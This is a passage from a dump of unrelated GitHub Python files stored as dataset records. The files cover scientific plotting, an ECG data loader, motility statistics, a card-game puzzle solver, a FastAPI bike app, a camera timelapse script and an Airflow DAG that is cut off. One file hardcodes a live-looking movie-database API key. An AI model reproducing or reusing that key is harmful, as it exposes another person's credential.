vf.confirm_0( dmax.std() )\n str1 = 'with $N_d = %d$' %( dmax[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname = '%s.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n\n\n #============================================\n # plot lepi_res - dmax \n #============================================\n\n def plot_lepi_res_dmax(self, filename): \n lepi_res = vf.my_read_pkl(filename) \n\n dmax = np.array([])\n ntrain = np.array([])\n pe_train = np.array([])\n pe_test = np.array([])\n sE_train = np.array([])\n sE_test = np.array([])\n\n Vnm = np.ones([ len(lepi_res), lepi_res[-1].dmax ]) *1e6\n\n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax )\n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n pe_train = np.append( pe_train, lepi_res[i].pe_train ) \n pe_test = np.append( pe_test, lepi_res[i].pe_test ) \n sE_train = np.append( sE_train, lepi_res[i].E_train.std() ) \n sE_test = np.append( sE_test, lepi_res[i].E_test.std() ) \n\n Vnm[i, 0:(lepi_res[i].dmax) ] = lepi_res[i].epi[:, 0, 1] \n\n vf.confirm_0( ntrain.std() )\n vf.confirm_0( sE_train.std() )\n vf.confirm_0( sE_test.std() )\n\n\n ax1 = create_ax1() \n fig_xlim = [dmax[0], dmax[-1]]\n\n for j in np.arange(Vnm.shape[1]): \n temp = Vnm[:,j]\n mask = ( temp != 1e6 ) \n xi = dmax[mask]\n yi = temp[mask] \n str1 = '$d_{%d}$' %(j+1)\n\n if j < 1.1:\n alpha = 1 \n elif j < 4.1:\n alpha = 0.7\n else:\n alpha = 0.4 \n\n ax1[0].plot( xi, yi, '-o', label=str1, alpha=alpha) \n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n str1 = 'training set, std = %.3f meV/atom' %(sE_train[0]*1e3) \n str2 = 'testing set, std = %.3f meV/atom' %(sE_test[0] *1e3) \n ax1[1].plot( dmax, pe_train, '-s', color='C0', label=str1)\n ax1[1].plot( dmax, pe_test, '-o', color='C1', label=str2)\n \n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2):\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( dmax, sigma_dUss_tilde, '-s', color='C2')\n\n\n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n\n # xt = ax1[2].get_xticks()\n # xtl = ax1[2].get_xticklabels()\n # for i in np.arange(len(xt)):\n # str1 = '$ d_{%d} $' %( xt[i] ) \n # xtl[i] = str1 \n # ax1[2].set_xticks(xt) \n # ax1[2].set_xticklabels(xtl) \n\n ax1[2].set_xlabel('$N_d$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n ax1[1].set_ylim([0, 1]) \n ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('percent error')\n ax1[2].set_ylabel('EPI-based $ \\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}} $ (eV)')\n\n\n str1 = 'with $N_\\\\mathrm{train} = %d$' %( ntrain[0] ) \n vf.my_text(ax1[0], str1, 0.5, 0.9, ha='center' )\n\n create_abc(ax1)\n\n figname = '%s.pdf' %(filename[0:-4])\n plt.savefig(figname)\n plt.close('all')\n\n\n\n\n\n\n\n\ndef create_ax1():\n fig_wh = [3, 6]\n fig_subp = [3, 1]\n fig1, ax1 = vf.my_plot(fig_wh, fig_subp)\n \n fig_pos = np.array([0.24, 0.71, 0.68, 0.26])\n for i in np.arange(fig_subp[0]):\n ax1[i].set_position( fig_pos + np.array([0, -0.32*i, 0, 0]) )\n\n return ax1 \n\n\n\ndef create_ax2():\n fig_wh = [3, 2.2]\n fig_subp = [1, 1]\n fig1, ax1 = vf.my_plot(fig_wh, fig_subp)\n \n fig_pos = np.array([0.24, 0.18, 0.68, 0.75])\n ax1.set_position( fig_pos )\n\n return ax1 \n\n\n\n\ndef create_abc(ax1):\n x = -0.31\n y = 1.02\n\n str1 = '(a)'\n vf.my_text(ax1[0], str1, x, y, weight='bold')\n\n str1 = '(b)'\n vf.my_text(ax1[1], str1, x, y, weight='bold')\n\n str1 = '(c)'\n vf.my_text(ax1[2], str1, x, y, weight='bold') \n\n\n\n\n\n\n\n\n\n","repo_name":"BinglunYin/myalloy_package","sub_path":"myvasp/vasp_epi_fit.py","file_name":"vasp_epi_fit.py","file_ext":"py","file_size_in_byte":13523,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"23597302600","text":"\nimport os\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef create_subseq(ts, look_back, pred_length):\n sub_seq, next_values = [], []\n for i in range(len(ts)-look_back-pred_length): \n sub_seq.append(ts[i:i+look_back])\n next_values.append(ts[i+look_back:i+look_back+pred_length].T[0])\n return sub_seq, next_values\n\n\ndef load(name='ecg', split=0.2):\n if name.lower() == \"ecg\":\n df = pd.read_csv(\"http://www.cs.ucr.edu/~eamonn/discords/qtdbsel102.txt\", header=None, delimiter='\\t')\n ecg = df.iloc[:,2].values\n ecg = ecg.reshape(len(ecg), -1)\n print('length of ECG data : ', len(ecg))\n\n # standardize\n scaler = StandardScaler()\n std_ecg = scaler.fit_transform(ecg)\n std_ecg = std_ecg[:5000]\n\n look_back = 10\n pred_length = 3\n\n sub_seq, next_values = create_subseq(std_ecg, look_back, pred_length) \n return np.array(sub_seq), np.array(next_values), std_ecg\n return\n","repo_name":"yuetan1988/tf-outlier-detection","sub_path":"tfod/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"3958441213","text":"'''\nTools for manipulating data structures.\nTODO : refactor and replace with standard `pandas` implementations.\n'''\nfrom __future__ import print_function, division\nimport numpy as np\n\ndef dict2array(d):\n '''\n Merges a dict of lists into a list of lists with the same order.\n\n Parameters\n ----------\n d : dict.\n\n Returns\n -------\n output : list.\n list of lists.\n order : list.\n keys from dict in order of listing.\n '''\n output = []\n order = []\n for u in d:\n output.append(list(d[u]))\n order.append(u)\n return output, order\n\ndef dictofdict2array(top_dict):\n '''\n Converts a dictionary of dictionaries with scalar values and converts\n to a list of lists.\n\n Parameters\n ----------\n top_dict : dict\n i.e. { a: {x1 : a1, x2 : a2, x3 : a3},\n b: {x1 : b1, x2 : b2, x3 : b3} }\n Returns\n -------\n output : list\n i.e. [ [a1, b1, c1], [a2, b2, c2] ]\n order : list\n keys of top_dict, ordered as listed.\n '''\n output = []\n order = []\n N = len( top_dict[ list(top_dict)[0] ] ) # number of cells\n i = 0\n while i < N:\n row = []\n for key1 in top_dict:\n key2 = list(top_dict[key1])[i]\n #print(key2)\n order.append(key2)\n\n row.append( top_dict[key1][key2] )\n output.append(row)\n i += 1\n return output, dedupe(order)\n\ndef tripledict2array(top_dict):\n '''\n Converts a teriary leveled dictionary to a list of lists.\n\n Parameters\n ----------\n top_dict : dict\n i.e. { a: {x1 : {y1 : [z1,]}, x2 : {y2: [z2,]} },\n b: {x1 : {y1 : [z1,]}, x2 : {y2: [z2, z3, z4]} } }\n\n Returns\n -------\n output : list\n i.e. [[z1, z2], [z1, z2, z3, z4]]\n order : list.\n keys of the tertiary dictionaries, ordered as listed.\n '''\n output = []\n order1 = []\n order2 = []\n order3 = []\n j = 0\n while j < len( top_dict[ list(top_dict)[0] ][ list(top_dict[ list(top_dict)[0] ])[0] ] ):\n row = []\n for key1 in top_dict:\n order1.append(key1)\n for key2 in top_dict[key1]:\n order2.append(key2)\n order3.append(list(top_dict[key1][key2])[j])\n if type(top_dict[key1][key2][ list(top_dict[key1][key2])[j] ]) == list:\n for item in top_dict[key1][key2][ list(top_dict[key1][key2])[j] ]:\n row.append(item)\n else:\n row.append( top_dict[key1][key2][ list(top_dict[key1][key2])[j] ] )\n output.append(row)\n j += 1\n return output, dedupe(order3)\n\ndef cell_ids2tracks(cell_ids):\n '''\n Converts a `cell_ids` dict to `tracksX` and `tracksY` (N,T) coordinate arrays.\n\n Parameters\n ----------\n cell_ids : dict\n cell paths, keyed by an `id`, valued are a list of tuple (x,y) coordinates.\n\n Returns\n -------\n tracksX, tracksY : ndarray.\n N x T arrays of X and Y locations respectively\n '''\n N = len(cell_ids)\n T = len(cell_ids[list(cell_ids)[0]])\n tracksX = np.zeros([N,T])\n tracksY = np.zeros([N,T])\n\n n_count = 0\n for c in cell_ids:\n cell = cell_ids[c]\n for t in range(T):\n tracksX[n_count, t] = cell[t][0]\n tracksY[n_count, t] = cell[t][1]\n n_count = n_count + 1\n\n return tracksX, tracksY\n\n\ndef dedupe(seq, idfun=None):\n '''\n Deduplicates lists.\n '''\n # order preserving\n if idfun is None:\n def idfun(x): return x\n seen = {}\n result = []\n for item in seq:\n marker = idfun(item)\n # in old Python versions:\n # if seen.has_key(marker)\n # but in new ones:\n if marker in seen: continue\n seen[marker] = 1\n result.append(item)\n return result\n\nimport itertools\ndef merge_flat_lists(lists):\n '''\n Merges a tertiary list of lists into a seconday list of lists.\n\n Parameters\n ----------\n lists : list.\n tertiary list of lists [ [[a0,a1,a2], [b0,b1,b2]] ]\n\n Returns\n -------\n merged_list : list.\n secondary list of lists [[a0,a1,a2,b0,b1,b2]]\n '''\n merged_list = []\n n_rows = len(lists[0])\n i = 0\n while i < n_rows:\n tmp_list = []\n for l in lists:\n tmp_list.append(l[i])\n\n tmp_merged = list( itertools.chain( *tmp_list ) )\n merged_list.append(tmp_merged)\n i += 1\n\n # merged_list = [ [all vals for one cell], [...], ... ]\n return merged_list\n\ndef single_outputs_list(cell_ids, gf, rwf, msdf, output_dir, suffix=None):\n '''\n Creates a list of lists list[N][M] of cell statistics for CSV export.\n\n Parameters\n ----------\n cell_ids : dict\n cell paths, keyed by an `id`, valued are a list of tuple (x,y) coordinates.\n\n gf : hmstats.GeneralFeatures object\n rwf : hmstats.RWFeatures object\n msdf : hmstats.MSDFeatures object\n output_dir : string\n path to output directory.\n suffix : string\n suffix appended to output filenames.\n\n Returns\n -------\n output_list : list\n list of lists, output_list[N][M], where `N` is cells and `M` is features.\n '''\n # Creates a list of lists for writing out statistics\n # Ea. internal list is a single cell's stats\n output_list = []\n if suffix:\n output_dir = output_dir + str(suffix)\n for cell in cell_ids:\n output_list.append([ output_dir, cell, gf.total_distance[cell], gf.net_distance[cell],\n gf.linearity[cell], gf.spearmanrsq[cell], gf.progressivity[cell], gf.max_speed[cell],\n gf.min_speed[cell], gf.avg_speed[cell], msdf.alphas[cell], rwf.hurst_RS[cell], rwf.nongaussalpha[cell],\n rwf.disp_var[cell], rwf.disp_skew[cell], rwf.diff_linearity[cell], rwf.diff_net_dist[cell] ])\n\n return output_list\n\n\ndef fix_order(correct_order, new_order, sorting):\n '''\n Fixes the order of a list in `sorting` with `new_order` to\n match the index order layed out in `correct_order`.\n\n Parameters\n ----------\n correct_order : list.\n contains keys in the correct order, guides sorting of the list `sorting`\n new_order : list.\n contains same set of keys in correct_order, but in a different order.\n sorting : list.\n list to be sorted based on the order in `correct_order`.\n '''\n # if order is correct, return input seq\n if correct_order == new_order:\n return sorting, new_order\n\n new_idx_order = [] # idx's of `correct_order[i]` loc in `new_order`\n for i in correct_order:\n new_idx_order += [new_order.index(i)]\n\n reordered_vals = []\n reordered_keys = []\n for i in range(len(new_idx_order)):\n reordered_vals += [sorting[new_idx_order[i]]]\n reordered_keys += [new_order[new_idx_order[i]]]\n\n assert correct_order == reordered_keys, 'keys not correctly ordered in `fix_order()`'\n return reordered_vals, reordered_keys\n\n\ndef make_merged_list(ind_outputs, gf, rwf):\n '''Merge output lists for all features\n\n Parameters\n ----------\n ind_outputs : list\n ind_outputs[N][M], where `N` is cells and `M` is features.\n gf : hmstats.GeneralFeatures object\n rwf : hmstats.RWFeatures object\n\n Returns\n -------\n merged_list : list\n merged_list[N][M], where `N` is cells and `M` is features.\n\n Notes\n -----\n Utilized `fix_order` and assertion checks to ensure that dictionary ordering\n is not perturbed during concatenation, which can occur in Python2 where\n dict primitive behavior is not robust to ordering in the manner of Python3.\n This is not official support for Python2, merely an attempt to prevent\n silent failure and generation of erroneous output.\n '''\n\n ind_order = []\n for i in ind_outputs:\n ind_order.append(i[1])\n\n autocorr_array, autocorr_order = dict2array(rwf.autocorr)\n autocorr_array, autocorr_order = fix_order(ind_order, autocorr_order, autocorr_array)\n assert ind_order == autocorr_order, 'individual and autocorr not in same order'\n\n diff_kurtosis_array, diff_kurtosis_order = dictofdict2array(rwf.diff_kurtosis)\n diff_kurtosis_array, diff_kurtosis_order = fix_order(ind_order, diff_kurtosis_order, diff_kurtosis_array)\n assert ind_order == diff_kurtosis_order, 'individual and diff_kurtosis not in same order'\n\n avg_moving_speed_array, avg_moving_speed_order = dictofdict2array( gf.avg_moving_speed )\n avg_moving_speed_array, avg_moving_speed_order = fix_order(ind_order, avg_moving_speed_order, avg_moving_speed_array)\n assert ind_order == avg_moving_speed_order, 'individual and avg_moving_speed not in same order'\n\n time_moving_array, time_moving_order = dictofdict2array( gf.time_moving )\n time_moving_array, time_moving_order = fix_order(ind_order, time_moving_order, time_moving_array)\n assert ind_order == time_moving_order, 'individual and time_moving not in same order'\n\n turn_list, turn_list_order = tripledict2array(gf.turn_stats)\n turn_list, turn_list_order = fix_order(ind_order, turn_list_order, turn_list)\n assert ind_order == turn_list_order, 'individual and turn_list not in same order'\n\n theta_list, theta_list_order = tripledict2array(gf.theta_stats)\n theta_list, theta_list_order = fix_order(ind_order, theta_list_order, theta_list)\n assert ind_order == theta_list_order, 'individual and theta_list not in same order'\n\n merged_list = merge_flat_lists([ind_outputs, diff_kurtosis_array, avg_moving_speed_array, time_moving_array, autocorr_array, turn_list, theta_list])\n return merged_list\n","repo_name":"cellgeometry/heteromotility","sub_path":"heteromotility/hmtools.py","file_name":"hmtools.py","file_ext":"py","file_size_in_byte":9644,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"5"} +{"seq_id":"28380230204","text":"#a function to run the parser on a directory\nfrom new_dir_setup import new_dir_setup\nfrom event_parser_hdf5 import event_parser_hdf5\nfrom traj_parser import traj_parser\nfrom Wolff_Repo.Utils.simple import *\nimport os\n\nif ynprompt('Use text file? (y/n)'):\n datdir = open(get_file()).read().split('\\n')\nelse:\n\n #prompt user to select a directory\n datdir = [get_directory().replace('/','\\\\')]\n\ninclude_trajectories = ynprompt('Would you like to include trajectories? (y/n)')\n\nfor dir in datdir:\n print(f'setting up {dir}')\n #check if this directory has already been setup by seeing if it has the parser subfolder\n if not 'parser' in os.listdir(dir):\n new_dir_setup.setup(dir)\n \n #set the directory where the h5 file is located\n active_dir = dir + r'\\parser'\n\n #add paths to trajectory files for each rat\n if include_trajectories:\n traj_parser.setup_dir(active_dir)\n\n#loop through each directory and actually run parser\nfor dir in datdir:\n print(f'parsing {dir}')\n\n #set the directory where the h5 file is located\n active_dir = dir + r'\\parser'\n\n #run the parser\n event_parser_hdf5.parsedirectory(active_dir, dir)\n if include_trajectories:\n traj_parser.parse_trajectories(active_dir)\n","repo_name":"WolffLab/Wolff_Repo","sub_path":"parser/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43099299479","text":"#!/usr/bin/env python3\nimport os\nfrom typing import List, Set, Tuple\nimport numpy as np\n\n\nclass Solver:\n def __init__(self, filepath: str) -> None:\n with open(filepath, 'r') as text_file:\n groups = list(map(lambda data: data.split('\\n'), text_file.read().strip().split('\\n\\n')))\n self.cards1 = list(map(int, groups[0][1:]))\n self.cards2 = list(map(int, groups[-1][1:]))\n self.game_count = 0\n # Note: Debug mode prints interim results for part 2, as seen in the original examples of the puzzle.\n # Use at your own risk! The number of games played for your puzzle input will be very high. It's over 9000!\n self.debug_part2 = False\n\n @staticmethod\n def calculate_score(cards: List[int]) -> int:\n return sum(np.multiply(cards, range(len(cards), 0, -1)))\n\n def debug(self, *values: object) -> None:\n \"\"\"Print values in debug mode only.\"\"\"\n if self.debug_part2:\n print(*values)\n\n def play_recursive_combat(self, game: int, cards1: List[int], cards2: List[int]) -> Tuple[int, List[int], List[int]]:\n \"\"\"Play a game of recursive combat, and return (winner, cards of player 1, cards of player 2).\"\"\"\n self.game_count = game\n configurations = set() # type: Set[Tuple[Tuple[int, ...], Tuple[int, ...]]]\n game_round = 0\n self.debug(f\"=== Game {game} ===\\n\")\n while cards1 and cards2:\n configuration = (tuple(cards1), tuple(cards2))\n # Check for repeated configuration.\n if configuration in configurations:\n # Win by infinite game prevention rule.\n self.debug(f\"The winner of game {game} is player 1 due to the infinite game prevention rule!\\n\")\n return 1, cards1, cards2\n\n configurations.add(configuration)\n if game_round > 0:\n self.debug()\n game_round += 1\n self.debug(f\"-- Round {game_round} (Game {game}) --\")\n self.debug(f\"Player 1's deck: {', '.join(str(card) for card in cards1)}\")\n self.debug(f\"Player 2's deck: {', '.join(str(card) for card in cards2)}\")\n # Draw cards.\n card1, card2 = cards1.pop(0), cards2.pop(0)\n self.debug(f\"Player 1 plays: {card1}\")\n self.debug(f\"Player 1 plays: {card2}\")\n # Check if a recursion is to be played.\n if len(cards1) >= card1 and len(cards2) >= card2:\n self.debug(\"Playing a sub-game to determine the winner...\\n\")\n winner, _, _ = self.play_recursive_combat(self.game_count + 1, cards1[:card1], cards2[:card2])\n self.debug(f\"...anyway, back to game {game}.\")\n else:\n winner = 1 if card1 > card2 else 2\n # Assign cards to winner.\n if winner == 1:\n cards1.extend([card1, card2])\n else:\n cards2.extend([card2, card1])\n self.debug(f\"Player {winner} wins round {game_round} of game {game}!\")\n # Win by regular combat.\n winner = 1 if cards1 else 2\n self.debug(f\"The winner of game {game} is player {winner}!\\n\")\n return winner, cards1, cards2\n\n def solve_part1(self) -> int:\n cards1, cards2 = list(self.cards1), list(self.cards2)\n while cards1 and cards2:\n card1, card2 = cards1.pop(0), cards2.pop(0)\n if card1 > card2:\n cards1.extend([card1, card2])\n else:\n cards2.extend([card2, card1])\n winner_cards = cards1 if cards1 else cards2\n return self.calculate_score(winner_cards)\n\n def solve_part2(self) -> int:\n winner, cards1, cards2 = self.play_recursive_combat(1, list(self.cards1), list(self.cards2))\n winner_cards = cards1 if winner == 1 else cards2\n print(\"\\n== Post-game results ==\")\n print(f\"Player 1's deck: {', '.join(str(card) for card in cards1)}\")\n print(f\"Player 2's deck: {', '.join(str(card) for card in cards2)}\")\n print()\n print(f\"{self.game_count} games played.\")\n return self.calculate_score(winner_cards)\n\n\nif __name__ == \"__main__\":\n solver = Solver(os.path.join(os.path.dirname(__file__), \"input.txt\"))\n print(solver.solve_part1())\n print(solver.solve_part2())\n","repo_name":"docToolchain/aoc-2020","sub_path":"day22/python/asung/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"5"} +{"seq_id":"21305204619","text":"import tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('listbox')\nwindow.geometry('400x400')\n\nvar1 = tk.StringVar()\n\nl = tk.Label(window, textvariable = var1, bg='yellow', width=4, height=2)\nl.pack()\n\ndef print_selection():\n value = lb.get(lb.curselection())\n var1.set(value)\nb = tk.Button(window, text='print_selection', width=15, height=2, command=print_selection)\nb.pack()\n\nvar2 = tk.StringVar()\nvar2.set((11,22,33,44))\nlb = tk.Listbox(window, listvariable=var2)\nlb.pack()\n\nlist_1=[1,2,3,4]\nfor i in list_1:\n lb.insert('end',i)\nlb.insert(1,'a')\nlb.insert(2,'b')\nlb.delete(2)\n\nwindow.mainloop()","repo_name":"ivan1003hsu/python_work","sub_path":"tkinter/tkinter-3.py","file_name":"tkinter-3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16990791626","text":"\ndef fact(n):\n fact = 1\n for i in range(1,n+1):\n fact = fact * i\n return fact\n\nfor _ in range(int(input())):\n n = int(input())\n print(fact(n))\n\n \n#same approach without function\nfor _ in range(int(input())):\n fact=[]\n res=1\n for num in range(1,int(input())+1):\n res *= num\n print(res)\n","repo_name":"annshiv/codechef","sub_path":"Beginner/Small factorial (FLOW018)/small_factorial.py","file_name":"small_factorial.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"12994148338","text":"\nimport tensorflow as tf\nimport os\nimport zipfile\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\nDESIRED_ACCURACY = 0.999\nlabels={0:'Happy',1:'Sad'}\n\n\nclass MyCallBack(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if logs[\"acc\"]>0.999:\n print(\"ACcuracy reached 100%\")\n self.model.stop_training=True\ncallback=MyCallBack()\ndef generator(path):\n train_gen= ImageDataGenerator(rescale=1/255.0)\n train_data=train_gen.flow_from_directory(directory=path, target_size=(300,300),class_mode=\"binary\", batch_size=8)\n return train_data\ndef build_model():\n model=tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(64,3, activation=\"relu\",input_shape=(300,300,3)),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Conv2D(64,3,activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Conv2D(64,3,activation=\"relu\"),\n tf.keras.layers.MaxPooling2D(),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512,activation=\"relu\"),\n tf.keras.layers.Dense(1,activation=\"sigmoid\")\n ])\n model.compile(optimizer=\"adam\",loss=\"binary_crossentropy\",metrics=[\"acc\"])\n return model\ndef plot_loss_acc(history):\n epochs= range(len(history.history['acc']))\n acc=history.history['acc']\n loss=history.history['loss']\n plt.plot(epochs,acc)\n plt.title(\"Accuracy\")\n plt.figure()\n plt.plot(epochs,loss)\n plt.title(\"Loss\")\n plt.show()\n\ndata_gen=generator(\"Datasets/h-or-s\")\n# show_predictions(None,data_gen)\nmodel=build_model()\nhistory=model.fit(data_gen, epochs=10, callbacks=[callback])\nplot_loss_acc(history)","repo_name":"dj5/TF-Programs-for-Practice","sub_path":"TF_CNN/happy_or_sad_cnn.py","file_name":"happy_or_sad_cnn.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6655900581","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 29 17:08:48 2022\r\n\r\n@author: Abin\r\n\"\"\"\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\", message=\"Reloaded modules: \")\r\n\r\nfrom Credit_Card import CreditCard\r\n\r\n# Inherting the CreditCard class\r\nclass PredatoryCreditCard(CreditCard):\r\n \r\n '''\r\n The new constructor will have an additional new parameter,\r\n Annual Percentage Rate (APR).\r\n The body of our new constructor relies upon\r\n making a call to the inherited constructor to perform most of the initialization (in\r\n fact, everything other than the recording of the percentage rate).\r\n '''\r\n \r\n def __init__(self, customer, bank, account, limit, apr):\r\n '''\r\n Creating a predatory credit card instance.\r\n \r\n The initial balance being 0.\r\n \r\n All the attributes being the same with an additional parameter being -->\r\n APR: Annual Percentage Rate (0.0825 for 8.25% APR)\r\n '''\r\n super.__init__(customer, bank, account, limit) # Calling the super constructor\r\n self._apr = apr\r\n \r\n # OVERRIDING the charge method from the Parent class\r\n def charge(self, price):\r\n '''\r\n Charge given price to the card, assuming sufficient credit limit.\r\n \r\n Return True if charge was processed,\r\n else return False and assess an extra $5 fee is charge is denied.\r\n '''\r\n success = super().charge(price) # Calling the inherited method.\r\n if not success:\r\n self._balance += 5 # assess penalty\r\n return success # caller expects some return\r\n \r\n def process_month(self):\r\n '''\r\n Assess monthly interest on outstanding balance.\r\n '''\r\n if self._balance > 0:\r\n # if positive balance, convert APR to monthly multiplicative factor.\r\n monthly_factor = pow(1 + self._apr, 1/12)\r\n self._balance *= monthly_factor\r\n","repo_name":"Spartan-119/Book-Data-Structures-and-Algorithms-in-Python","sub_path":"Inheritance/Credit_Card/Predatory_Credit_Card.py","file_name":"Predatory_Credit_Card.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25750278979","text":"import os\nimport csv\nimport time\nfrom fastapi import Depends, FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy import create_engine, event\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.db import engine, get_db\n\napp = FastAPI()\n\nDATA_DIRECTORY = '/data'\n\norigins = [\n \"http://localhost:3000\",\n \"http://localhost\",\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=[\"*\"],\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\nINITIAL_DATA = { \"stations\": [], \"journeys\": [] }\n\ndef get_data():\n with open(f'{DATA_DIRECTORY}/Helsinki_and_Espoo_city_bike_stations.csv') as csv_file:\n reader = csv.reader(csv_file , delimiter=',', quotechar='\"', skipinitialspace=True)\n headers = next(csv_file) \n for line in reader:\n station = { \"id\": line[1], \"name\": line[2], \"address\": line[5], \"city\": line[7] if line[7] else \"Helsinki\", \"capacity\": line[10], \"x\": line[11], \"y\": line[12]}\n INITIAL_DATA[\"stations\"].append(station)\n for file in os.listdir(f'{DATA_DIRECTORY}/journeys'):\n count = 0\n with open(f\"{DATA_DIRECTORY}/journeys/{file}\", newline=\"\") as csv_file:\n reader = csv.reader(csv_file , delimiter=',', quotechar='\"', skipinitialspace=True)\n headers = next(csv_file)\n for row in reader:\n if (count < 100):\n # Ignore distances smaller than 10m as well as durations of less than 10s\n if not row[6] or float(row[6]) < 10.0 or float(row[7]) < 10.0:\n continue\n journey = { \"departure_date\": row[0], \"return_date\": row[1], \"departure_station_id\": row[2], \"return_station_id\": row[4], \"distance\": row[6], \"duration\": row[7] }\n INITIAL_DATA[\"journeys\"].append(journey)\n count = count + 1\n\ndef initialize_table(target, connection, **kw):\n try:\n tablename = str(target)\n if tablename in INITIAL_DATA and len(INITIAL_DATA[tablename]) > 0:\n connection.execute(target.insert(), INITIAL_DATA[tablename])\n except:\n time.sleep(1)\n print(error)\n\nevent.listen(models.Station.__table__, 'after_create', initialize_table)\nevent.listen(models.Journey.__table__, 'after_create', initialize_table)\n\n# This will create the DB schema and trigger the \"after_create\" event\n@app.on_event(\"startup\")\ndef configure():\n get_data()\n models.Base.metadata.create_all(bind=engine)\n\n@app.get(\"/journeys\")\nasync def list_all_journeys(db: Session = Depends(get_db)):\n return crud.list_all_journeys(db=db)\n\n@app.get(\"/stations\")\nasync def list_all_stations(db: Session = Depends(get_db)):\n return crud.list_all_stations(db=db)\n\n","repo_name":"larenala/citybikes","sub_path":"bikes_backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23624355839","text":"from picamera import PiCamera\nfrom time import sleep\nfrom fractions import Fraction\n\ncamera = PiCamera(resolution=(1280, 720), framerate=Fraction(1, 6), sensor_mode=3)\ncamera.shutter_speed = 6000000\ncamera.iso = 800\nsleep(60)\ncamera.exposure_mode = 'off'\n\ntry:\n for filename in camera.capture_continuous('/home/pi/augury/test/img{counter:03d}.jpg'):\n print('Captured %s' % filename)\n sleep(60) # wait 1 minute\n camera.exposure_mode = 'off'\nfinally:\n camera.close()\n","repo_name":"microresearch/notes","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"35858244496","text":"import requests\n\napi_key = 'aec5022933c801e70135b0874cc9bf39'\n\ndef nomeFilme(nome):\n url = f'https://api.themoviedb.org/3/search/movie?api_key={api_key}&query={nome}'\n response = requests.get(url)\n return response.json()\n\n ","repo_name":"gabriel-lacerdaa/Galeria-de-Filmes","sub_path":"testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34480388933","text":"import requests\nimport pandas as pd\nfrom datetime import timedelta\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.python import PythonOperator\n\nTOP_1M_DOMAINS = 'http://s3.amazonaws.com/alexa-static/top-1m.csv.zip'\nTOP_1M_DOMAINS_FILE = 'top-1m.csv'\n\n\ndef get_data():\n \n top_doms = pd.read_csv(TOP_1M_DOMAINS)\n top_data = top_doms.to_csv(index=False)\n\n with open(TOP_1M_DOMAINS_FILE, 'w') as f:\n f.write(top_data)\n \ndef get_top_10_domain_zones():\n \n top_data_df = pd.read_csv(TOP_1M_DOMAINS_FILE, names=['rank', 'domain'])\n \n top_10_domain_zones = top_data_df\n top_10_domain_zones['domain_zones'] = top_data_df.domain.str.split('.').str[1]\n top_10_domain_zones['count'] = top_data_df.domain.str.split('.').str[1]\n \n top_10_domain_zones = top_10_domain_zones.groupby('domain_zones', as_index=False).agg({'count': 'count'}).\\\n sort_values('count', ascending=False).reset_index(drop=True).head(10)\n \n with open('top_10_domain_zones.csv', 'w') as f:\n f.write(top_10_domain_zones.to_csv(index=False, header=False))\n\n\ndef 